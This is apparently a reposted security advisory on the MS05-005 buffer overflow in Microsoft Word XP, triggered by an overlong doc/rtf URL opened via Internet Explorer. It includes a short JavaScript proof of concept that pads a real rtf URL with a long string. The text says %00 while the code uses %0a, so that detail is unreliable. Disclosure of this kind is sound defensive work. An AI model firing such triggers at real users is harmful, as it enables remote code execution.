Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)Summary
A new vulnerability in Microsoft Word XP allows an attacker to launch a buffer overflow attack. This attack could occur when a user opened a Word document using Internet Explorer.
Credit:
The information has been provided by Rafel Ivgi.
Details
When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP "takes over" and opens that doc file. The problem appears when sending a doc file request that contains a null byte (parser) at the end of the doc filename (the rtf extension is also vulnerable).
For Example:
http://example.com/myfile.doc is a valid request.
However the following: http://example.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc is an invalid request. Such a request will be sent to the server hosting the doc file.
Most servers like IIS and Apache will truncate the characters before the %00 while sending the filename to Internet Explorer. At this stage, Internet Explorer will hand over the string to Microsoft Word XP, which will now receive a long string. This string causes an exploitable buffer overflow, allowing remote code execution.
Proof of Concept Code:
<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>
Vendor Status:
Microsoft was notified on July 13, 2004.
Microsoft released an advisory and patches to this vulnerability. For further details please refer to:
Vulnerability in Microsoft Office XP could allow Remote Code Execution (MS05-005)
推荐
评论(0条)
